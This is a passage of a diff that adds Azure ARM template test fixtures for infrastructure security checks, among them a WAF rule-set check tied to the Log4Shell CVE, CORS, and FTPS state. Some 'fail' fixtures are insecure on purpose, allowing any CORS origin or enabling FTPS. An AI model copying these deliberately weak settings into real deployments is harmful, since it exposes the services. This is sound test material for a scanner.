+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json
new file mode 100644
index 00000000000..c2da54352dc
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json
@@ -0,0 +1,248 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "version_3_1_default_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetVersion": "3.1"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json
new file mode 100644
index 00000000000..b889454d7a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "*"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json
new file mode 100644
index 00000000000..28a78e3a72c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json
index 074e4fdfded..04a41face4c 100644
--- a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json
+++ b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json
@@ -111,7 +111,7 @@
                     "index.php",
                     "hostingstart.html"
                 ],
-                "netFrameworkVersion": "v7.0",
+                "netFrameworkVersion": "v8.0",
                 "phpVersion": "5.6",
                 "requestTracingEnabled": true,
                 "requestTracingExpirationTime": "9999-12-31T23:59:00Z",
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json
new file mode 100644
index 00000000000..1aabdaa8313
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "fail",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]",
+                "siteConfig": {
+                    "ftpsState": "Enabled"
+                }
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json
new file mode 100644
index 00000000000..edd918f12d5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json
@@ -0,0 +1,19 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "fail2",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]",
+                "siteConfig": {}
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json
new file mode 100644
index 00000000000..fc85635e354
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json
@@ -0,0 +1,28 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "fail3",
+      "properties": {
+        "publisherEmail": "[parameters('adminEmail')]",
+        "publisherName": "[parameters('organizationName')]",
+        "customProperties": "[parameters('customProperties')]",
+        "siteConfig": {
+          "ftpsState": "Enabled",
+          "appSettings": [
+            {
+              "name": "WEBSITE_NODE_DEFAULT_VERSION",
+              "value": "14.17.0"
+            }
+          ]
+        },
+        "linuxFxVersion": "NODE|14-lts"
+      },
+      "resources": [],
+      "dependsOn": []
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json
new file mode 100644
index 00000000000..d9c43d9d324
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "pass",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]",
+                "siteConfig": {
+                    "ftpsState": "Disabled"
+                }
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json
new file mode 100644
index 00000000000..97c115d60c3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
